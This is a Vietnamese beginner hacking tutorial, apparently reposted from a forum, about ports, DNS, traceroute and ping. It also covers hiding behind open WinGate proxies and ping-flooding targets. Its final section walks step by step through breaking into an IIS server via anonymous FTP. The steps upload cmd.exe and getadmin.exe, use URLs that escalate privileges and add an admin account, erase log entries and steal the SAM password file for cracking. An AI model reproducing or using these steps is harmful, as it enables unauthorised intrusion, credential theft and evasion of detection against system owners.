cơ bản nhất để trở thành Hacker 2
--------------------------------------------------------------------------------
Vitual port ( cổng ảo ) là 1 số tự nhiên đựợc gói ở trong TCP(Tranmission Control Protocol) và UDP(User Diagram Protocol) header. Như mọi nguòi đã biết, Windows có thể chạy nhiều chương trình 1 lúc, mỗi chương trình này có 1 cổng riêng dùng để truyền và nhận dữ liệu.
Ví dụ 1 máy có địa chỉ IP là 127.0.0.1 chạy WebServer, FTP_Server, POP3 server, etc, những dịch vụ này đều đuọc chạy trên 1 IP address là 127.0.0.1, khi một gói tin đuọc gửi đến làm thế nào máy tính của chúng ta phân biệt được gói tin này đi vào dịch vụ nào WebServer hay FTP server hay SM! TP? Chính vì thế Port xuất hiện. Mỗi dịch vụ có 1 số port mặc định, ví dụ FTP có port mặc định là 21, web service có port mặc định là 80, POP3 là 110, SMTP là 25 vân vân....
Người quản trị mạng có thể thay đổi số port mặc định này, nếu bạn ko biết số port trên một máy chủ, bạn ko thể kết nối vào dịch vụ đó được. Chắc bạn đã từng nghe nói đến PORT MAPPING nhưng có lẽ chưa biết nó là gì và chức năng thế nào. Port mapping thực ra đơn giản chỉ là quá trình chuyển đổi số port mặc định của một dịch vụ nào đó đến 1 số khác. Ví dụ Port mặc định của WebServer là 80, nhưng thỉnh thoảng có lẽ bạn vẫn thấy http://www.xxx.com:8080 , 8080 ở đây chính là số port của host xxx nhưng đã đuợc nguòi quản trị của host này ''map'' từ 80 thành 8080.
( Tài liệu của HVA )
15 . ) DNS là gì ?
_ DNS là viết tắt của Domain Name System. Một máy chủ DNS đợi kết nối ở cổng số 53, có nghĩa là nếu bạn muốn kết nối vào máy chủ đó, bạn phải kết nối đến cổng số 53. Máy chủ chạy DNS chuyển hostname bằng các chữ cái thành các chữ số tương ứng và ngược lại. Ví dụ: 127.0.0.1 -- > localhost và localhost--- > 127.0.0.1 .
( Tài liệu của HVA )
16 . ) Đôi điều về Wingate :
_ WinGate là một chương trình đơn giản cho phép bạn chia các kết nối ra. Thí dụ: bạn có thể chia sẻ 1 modem với 2 hoặc nhiều máy . WinGate dùng với nhiều proxy khác nhau có thể che giấu bạn .
_ Làm sao để Wingate có thể che dấu bạn ? Hãy làm theo tôi : Bạn hãy telnet trên cổng 23 trên máy chủ chạy WinGate telnet proxy và bạn sẽ có dấu nhắc WinGate > . Tại dấu nhắc này bạn đánh vào tên server, cùng một khoảng trống và cổng bạn muốn kết nối vào. VD :
CODE
telnet wingate.net
WinGate > victim.com 23
ta telnet đến cổng 23 vì đây là cổng mặc định khi bạn cài Wingate . lúc này IP trên máy mà victim chộp được của ta là IP của máy chủ chứa Wingate proxy đó .
_ Làm sao để tìm Wingate ?
+ Nếu bạn muốn tìm IP WinGates tĩnh (IP không đổi) thì đến yahoo hay một trang tìm kiếm cable modem. Tìm kiếm cable modems vì nhiều người dùng cable modems có WinGate để họ có thể chia sẻ đường truyền rộng của nó cable modems cho những máy khác trong cùng một nhà . Hoặc bạn có thể dùng Port hay Domain scanners và scan Port 1080 .
+ Để tìm IP động (IP thay đổi mỗi lần user kết nối vào internet) của WinGates bạn có thể dùng Domscan hoặc các chương trình quét khác . Nếu dùng Domscan bạn hãy nhập khoảng IP bất kỳ vào box đầu tiên và số 23 vào box thứ 2 . Khi đã có kết quả , bạn hãy thử lần lượt telnet đến các địa chỉ IP tìm đựơc ( đã hướng dẫn ở trên ), nếu nó xuất hiện dấu "Wingate > " thì bạn đã tìm đúng máy đang sử dụng Wingate rồI đó .
+ Theo kinh nghiệm của tôi thì bạn hãy down wingatescanner về mà sài , nó có rất nhièu trên mạng .
17 . ) Đôi điều về Traceroute :
_ Traceroute là một chương trình cho phép bạn xác định được đường đi của các gói packets từ máy bạn đến hệ thống đích trên mạng Internet.
_ bạn hãy xem VD sau :
CODE
C:\windows > tracert 203.94.12.54
Tracing route to 203.94.12.54 over a maximum of 30 hops
1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms
Tôi cần biết đường đi từ máy tôi đến một host trên mạng Internet có địa chỉ ip là 203.94.12.54. Tôi cần phải tracert đến nó! Như bạn thấy ở trên, các gói packets từ máy tôi muốn đến được 203.94.12.54 phải đi qua 13 hops(mắc xích) trên mạng. Đây là đưòng đi của các gói packets .
_ Bạn hãy xem VD tiếp theo :
CODE
host2 # traceroute xyz.com
traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms
+ Dòng đầu tiên cho biết hostname và địa chỉ IP của hệ thống đích. Dòng này còn cho chúng ta biết thêm giá trị TTL<=30 và kích thước của datagram là 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data).
+ Dòng thứ 2 cho biết router đầu tiên nhận được datagram là 202.xy.34.12, giá trị của TTL khi gởi đến router này là 1. Router này sẽ gởi trở lại cho chương trình traceroute một ICMP message error ''Time Exceeded''. Traceroute sẽ gởi tiếp một datagram đến hệ thống đích.
+ Dòng thứ 3, xyz.com(202.xx.12.34) nhận được datagram có TTL=1(router thứ nhất đã giảm một trước đó - TTL=2-1=1). Tuy nhiên, xyz.com không phải là một router, nó sẽ gởi trở lại cho traceroute một ICMP error message ''Port Unreachable''. Khi nhận được ICMP message này, traceroute sẽ biết được đã đến được hệ thống đích xyz.com và kết thúc nhiệm vụ tại đây.
+ Trong trường hợp router không trả lời sau 5 giây, traceroute sẽ in ra một dấu sao ''*''(không biết) và tiếp tục gởi datagram khác đến host đích!
_Chú ý:
Trong windows: tracert hostname
Trong unix: traceroute hostname
( Tài liệu của viethacker.net )
18 . ) Ping và cách sử dụng :
_ Ping là 1 khái niệm rât đơn giản tuy nhiên rất hữu ích cho việc chẩn đoán mạng. Tiểu sử của từ ''ping'' như sau: Ping là tiếng động vang ra khi 1 tàu ngầm muốn biết có 1 vật thể khác ở gần mình hay ko, nếu có 1 vật thể nào đó gần tàu ngầm tiếng sóng âm này sẽ va vào vật thể đó và tiếng vang lại sẽ là ''pong'' vậy thì tàu ngầm đó sẽ biết là có gì gần mình.
_Trên Internet, khái niệm Ping cũng rất giống với tiểu sử của nó như đã đề cập ở trên. Lệnh Ping gửi một gói ICMP (Internet Control Message Protocol) đến host, nếu host đó ''pong'' lại có nghĩa là host đó tồn tại (hoặc là có thể với tới đựoc). Ping cũng có thể giúp chúng ta biêt được luợng thời gian một gói tin (data packet) đi từ máy tính của mình đến 1 host nào đó.
_Ping thật dễ dàng, chỉ cần mở MS-DOS, và gõ ''ping địa_chỉ_ip'', mặc định sẽ ping 4 lần, nhưng bạn cũng có thể gõ
CODE
''ping ip.address -t''
Cách này sẽ làm máy ping mãi. Để thay đổi kích thước ping làm như sau:
CODE
''ping -l (size) địa_chỉ_ip ''
Cái ping làm là gửi một gói tin đến một máy tính, sau đó xem xem mất bao lâu gói tin rồi xem xem sau bao lâu gói tin đó quay trở lại, cách này xác định được tốc độ của kết nối, và thời gian cần để một gói tin đi và quay trở lại và chia bốn (gọi là ''trip time''). Ping cũng có thể được dùng để làm chậm đi hoặc đổ vỡ hệ thống bằng lụt ping. Windows 98 treo sau một phút lụt ping (Bộ đệm của kết nối bị tràn - có qua nhiều kết nối, nên Windows quyết định cho nó đi nghỉ một chút). Một cuộc tấn công "ping flood" sẽ chiếm rất nhiều băng thông của bạn, và bạn phải có băng thông lớn hơn đối phương ( trừ khi đối phương là một máy chạy Windows 98 và bạn có một modem trung bình, bằng cách đó bạn sẽ hạ gục đối phương sau xấp xỉ một phút lụt ping). Lụt Ping không hiệu quả lắm đổi với những đối phương mạnh hơn một chút. trừ khi bạn có nhiều đường và bạn kiểm soát một số lượng tương đối các máy chủ cùng ping mà tổng băng thông lơn hơn đối phương.
Chú ý: option -t của DOS không gây ra lụt ping, nó chỉ ping mục tiêu một cách liên tục, với những khoảng ngắt quãng giữa hai lần ping liên tiếp. Trong tất cả các hệ Unix hoặc Linux, bạn có thể dùng ping -f để gây ra lụt thực sự. Thực tế là phải ping -f nếu bạn dùng một bản tương thích POSIX (POSIX - Portable Operating System Interface dựa trên uniX), nếu không nó sẽ không phải là một bản Unix/Linux thực sự, bởi vậy nếu bạn dùng một hệ điều hành mà nó tự cho nó là Unix hay Linux, nó sẽ có tham số -f.
( Tài liệu của HVA và viethacker.net )
19 . ) Kỹ thuật xâm nhập Window NT từ mạng Internet :
_ Đây là bài học hack đầu tiên mà tôi thực hành khi bắt đầu nghiên cứu về hack , bây giờ tôi sẽ bày lại cho các bạn . bạn sẽ cần phảI có một số thờI gian để thực hiện được nó vì nó tuy dễ nhưng khó . Ta sẽ bắt đầu :
_ Đầu tiên bạn cần tìm một server chạy IIS :
_ Tiếp đến bạn vào DOS và đánh ' FTP '. VD :
c:\Ftp www.dodgyinc.com
( trang naỳ khi tôi thực hành thì vẫn còn làm được , bây giờ không biết họ đã fix chưa , nếu bạn nào có trang nào khác thì hãy post lên cho mọI ngườI cùng làm nhé )
Nếu connect thành công , bạn sẽ thấy một số dòng tương tự như thế này :
CODE
Connected to www.dodgyinc.com.
220 Vdodgy Microsoft FTP Service (Version 3.0).
User (www.dodgyinc.comnone)):
Cái mà ta thấy ở trên có chứa những thông tin rất quan trọng , nó cho ta biết tên Netbios của máy tính là " Vdodgy " . Từ điều này bạn có thể suy diễn ra tên mà được sử dụng cho NT để cho phép ta có thể khai thác , mặc định mà dịch vụ FTP gán cho nó nếu nó chưa đổi tên sẽ là "IUSR_VDODGY" . Hãy nhớ lấy vì nó sẽ có ích cho ta . Nhập ''anonymous" trong user nó sẽ xuất hiện dòng sau :
CODE
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
Bây giờ passwd sẽ là bất cứ gì mà ta chưa biết , tuy nhiên , bạn hãy thử đánh vào passwd là "anonymous" . Nếu nó sai , bạn hãy log in lạI thiết bị FTP , bạn hãy nhớ là khi ta quay lạI lần này thì không sử dụng cách mạo danh nữa ( anonymous ) mà sử dụng "'Guest" , thử lại passwd với "guest" xem thế nào .
Bây giờ bạn hãy đánh lệnh trong DOS :
CODE
Cd /c
Và sẽ nhìn thấy kết quả nếu như bạn đã xâm nhập thành công , bây giờ bạn hãy nhanh chóng tìm thư mục 'cgi-bin' . Nếu như bạn may mắn , bạn sẽ tìm được dễ dàng vì thông thường hệ thống quản lý đã đặt 'cgi-bin' vào nơi mà ta vừa xâm nhập để cho các ngườI quản lý họ dễ dàng điều khiển mạng hơn . thư mục cgi-bin có thể chứa các chương trình mà bạn có thể lợi dụng nó để chạy từ trình duyệt Web của bạn . Ta hãy bắt đầu "quậy" nào greenbiggrin.gif greenbiggrin.gif .
_ Đầu tiên , bạn hãy chuyển tớ thư mục cgi-bin và sử dụng lệnh "Binary" ( có thể các bạn không cần dùng lệnh này ) , sau đó bạn dánh tiếp lệnh "put cmd.exe" . Tiếp theo là bạn cần có file hack để cài vào thư mục này , hãy tìm trên mạng để lấy 2 file quan trọng nhất đó là 'getadmin.exe' và 'gasys.dll' . Download chúng xuống , một khi bạn đã có nó hãy cài vào trong thư mục cgi-bin . Ok , coi như mọI việc đã xong , bạn hãy đóng cửa sổ DOS .
Bây giờ bạn hãy đánh địa chỉ sau lên trình duyệt của bạn :
http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?IUSR_VDODGY
Sau vài giây bạn sẽ có được câu trả lời như ở dướI đây :
CODE
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Congratulations , now account IUSR_VDODGY have administrator rights!
Thế là bạn đã mạo danh admin để xâm nhập hệ thống , việc cần thiết bây giờ là bạn hãy tự tạo cho mình một account , hãy đánh dòng sau trên IE :
http://www.dodgyinc.com/cgi- bin/cmd.exe?/c%20c:\winnt\system32
et.exe%20user%2 0hacker%20toilahacker%20/add
dòng lệnh trên sẽ tạo cho bạn một account login với user : anhdenday và passwd : toilahackerBây giờ bạn hãy là cho user này có account của admin , bạn chỉ cần đánh lên IE lệnh :
http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?anhdenday
Vậy là xong rùi đó , bạn hãy disconnect và đến start menu - > find rồi search computer 'www.dodgyinc.com'. Khi tìm thấy , bạn vào explore , explore NT sẽ mở ra bạn hay nhập user và passwd để mở nó ( của tôi là user : anhdenday và passwd : toilahacker ) .
Có một vấn đề là khi bạn xâm nhập hệ thống này thì sẽ bị ghi lại , do đó để xoá dấu vết bạn hãy vào 'Winnt\system32\logfiles' mở file log đó rồI xoá những thông tin liên quan đến bạn , rồI save chúng . Nếu bạn muốn lấy một thông báo gì về việc chia sẽ sự xâm nhập thì bạn hãy thay đổi ngày tháng trên máy tính vớI URL sau :
http://www.dodgyinc.com/cgi-bin/cm d.exe?/c%20date%2030/04/03
xong rồI bạn hãy xoá file 'getadmin.exe', và 'gasys.dll' từ 'cgi-bin' . Mục đích khi ta xâm nhập hệ thống này là "chôm" pass của admin để lần sau xâm nhập một cách hợp lệ , do đó bạn hãy tìm file SAM ( chứa pass của admin và member ) trong hệ thống rồI dùng chương trình "l0pht crack" để crack pass ( Hướng dẫn về cách sử dụng "l0pht crack v 3.02" tôi đã post lên rồi ,các bạn hãy tự nghiên cứu nhé ) . Đây là link : http://vnhacker.org/forum/?act=ST& f=6&t=11566&s=
Khi crack xong các bạn đã có user và pass của admin rồI , bây giờ hãy xoá account của user ( của tôi là "anhdenday" ) đi cho an toàn . Bạn đã có thể làm gì trong hệ thống là tuỳ thích , nhưng các bạn đừng xoá hết tài liệu của họ nhé , tội cho họ lắm .
Bạn cảm thấy thế nào , rắc rối lắm phải không . Lúc tôi thử hack cách này , tôi đã mày mò mất cả 4 giờ , nếu như bạn đã quen thì lần thứ 2 bạn sẽ mất ít thờI gian hơn .
Ở phần 3 tôi sẽ đề cập đến HĐH Linux , đến cách ngắt mật khẩu bảo vệ của một Web site , và làm thế nào để hack một trang web đơn giản nhất .v.v...
Tác giả: Anhdenday - HVAOnline.net
Bạn đang đọc truyện trên: AzTruyen.Top